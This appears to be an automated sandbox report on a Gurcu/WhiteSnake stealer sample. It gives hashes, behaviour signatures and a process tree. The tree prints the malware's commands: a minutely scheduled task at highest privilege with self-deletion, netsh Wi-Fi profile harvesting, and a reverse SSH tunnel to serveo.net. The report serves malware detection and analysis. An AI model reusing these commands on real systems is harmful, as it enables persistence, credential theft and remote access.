Overview

overview

10

Static

static

10

tmp.exe

windows7-x64

10

tmp.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    165s
  • max time network
    184s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-09-2023 06:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    tmp.exe

  • Size

    426KB

  • MD5

    ef43d260ba94eea5dad184fcb6e1abcf

  • SHA1

    2cad3eaa11d5842b430ca28c9d185bc82d7661d1

  • SHA256

    8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458

  • SHA512

    de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a

  • SSDEEP

    6144:3Gd/t/a2zDGVPJXvnzZjDJHb571Kjn1929XDccHa+u9bamBftR0RgW:cRatpvnzZjDv7oj19yTaAmBftR0CW

Score
10/10
gurcucollectiondiscoveryspywarestealer

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 4 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

    stealergurcu
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
    collection
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5112
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "tmp" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\tmp.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4772
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:4884
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:4740
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "tmp" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:4616
        • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
          "C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4604
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2640
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:3928
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                5⤵
                  PID:3668
                • C:\Windows\system32\findstr.exe
                  findstr /R /C:"[ ]:[ ]"
                  5⤵
                    PID:452
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1188
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    5⤵
                      PID:704
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      5⤵
                        PID:1268
                      • C:\Windows\system32\findstr.exe
                        findstr "SSID BSSID Signal"
                        5⤵
                          PID:3972
                      • C:\Windows\System32\OpenSSH\ssh.exe
                        "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3263 serveo.net
                        4⤵
                          PID:1628
                  • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
                    C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
                    1⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook profiles
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    • outlook_office_path
                    • outlook_win_path
                    PID:3324
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3724
                      • C:\Windows\system32\findstr.exe
                        findstr /R /C:"[ ]:[ ]"
                        3⤵
                          PID:4812
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profiles
                          3⤵
                            PID:4440
                          • C:\Windows\system32\chcp.com
                            chcp 65001
                            3⤵
                              PID:3892
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4492
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              3⤵
                                PID:492
                              • C:\Windows\system32\netsh.exe
                                netsh wlan show networks mode=bssid
                                3⤵
                                  PID:2656
                                • C:\Windows\system32\findstr.exe
                                  findstr "SSID BSSID Signal"
                                  3⤵
                                    PID:4404
                                • C:\Windows\System32\OpenSSH\ssh.exe
                                  "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:3263 serveo.net
                                  2⤵
                                    PID:2976

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\.ssh\known_hosts
                                  Filesize

                                  407B

                                  MD5

                                  b89137b6bacc6612c5f2acfc5516e555

                                  SHA1

                                  e95ff41da385ee31c09501b1dcb90f8d3e89b391

                                  SHA256

                                  57fb35c680cb2530393ab3e08cfda5405457a860fe3db8454ff0e5fbd664a1f3

                                  SHA512

                                  97c7a535f643c45fa351a6ca9ed57d390805e0523a95574eb72fc2f78d25d116492e758ac7b579ca724aca9bdd711e9aa81dc66c45da43e1d2bb3280fcc13bdd

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tmp.exe.log
                                  Filesize

                                  847B

                                  MD5

                                  3308a84a40841fab7dfec198b3c31af7

                                  SHA1

                                  4e7ab6336c0538be5dd7da529c0265b3b6523083

                                  SHA256

                                  169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

                                  SHA512

                                  97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
                                  Filesize

                                  426KB

                                  MD5

                                  ef43d260ba94eea5dad184fcb6e1abcf

                                  SHA1

                                  2cad3eaa11d5842b430ca28c9d185bc82d7661d1

                                  SHA256

                                  8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458

                                  SHA512

                                  de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
                                  Filesize

                                  426KB

                                  MD5

                                  ef43d260ba94eea5dad184fcb6e1abcf

                                  SHA1

                                  2cad3eaa11d5842b430ca28c9d185bc82d7661d1

                                  SHA256

                                  8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458

                                  SHA512

                                  de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\WindowsSecurity\tmp.exe
                                  Filesize

                                  426KB

                                  MD5

                                  ef43d260ba94eea5dad184fcb6e1abcf

                                  SHA1

                                  2cad3eaa11d5842b430ca28c9d185bc82d7661d1

                                  SHA256

                                  8db489ea34fc35ad43552af9629978af98c14b947c058ef1a5d0e645a90c3458

                                  SHA512

                                  de879cf97066e6ca3c39200f01407dca79838ce03e2b3280aa37ab725aae96e9a15d6ad3a200ce184d3c1b7102a666c4ae051a8453fbca0ef9f6e38ec0942d0a

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\j615vue6hx\port.dat
                                  Filesize

                                  4B

                                  MD5

                                  f8037f94e53f17a2cc301033ca86d278

                                  SHA1

                                  c477daaf6618c98efb953d559c9efa6c015f58a6

                                  SHA256

                                  5b23e77bcbfd48044a8bd56f7689fc325f309690072fe25a5dfe11af0062a130

                                  SHA512

                                  633d2e8f4a275ad7aec9282c5ca4e2122d4396fb1868f21147a2864da90661ca3cad33b421cdc6acba20584c401540416fbb3a7cfd52d07d399af191bdc24941

                                  Download Submit

                                • memory/3324-18-0x00007FFCE0A30000-0x00007FFCE14F1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/3324-20-0x00000218AA8B0000-0x00000218AA8C0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/3324-22-0x00007FFCE0A30000-0x00007FFCE14F1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/3324-23-0x00000218AA8B0000-0x00000218AA8C0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4604-11-0x00007FFCE0A30000-0x00007FFCE14F1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/4604-12-0x000001FFE9A60000-0x000001FFE9A70000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4604-15-0x00007FFCE0A30000-0x00007FFCE14F1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/4604-16-0x000001FFE9A60000-0x000001FFE9A70000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/5112-6-0x00007FFCE0E30000-0x00007FFCE18F1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/5112-0-0x00000127F2490000-0x00000127F24FC000-memory.dmp

                                  Filesize

                                  432KB

                                  Download

                                • memory/5112-2-0x00000127F4B10000-0x00000127F4B20000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/5112-1-0x00007FFCE0E30000-0x00007FFCE18F1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download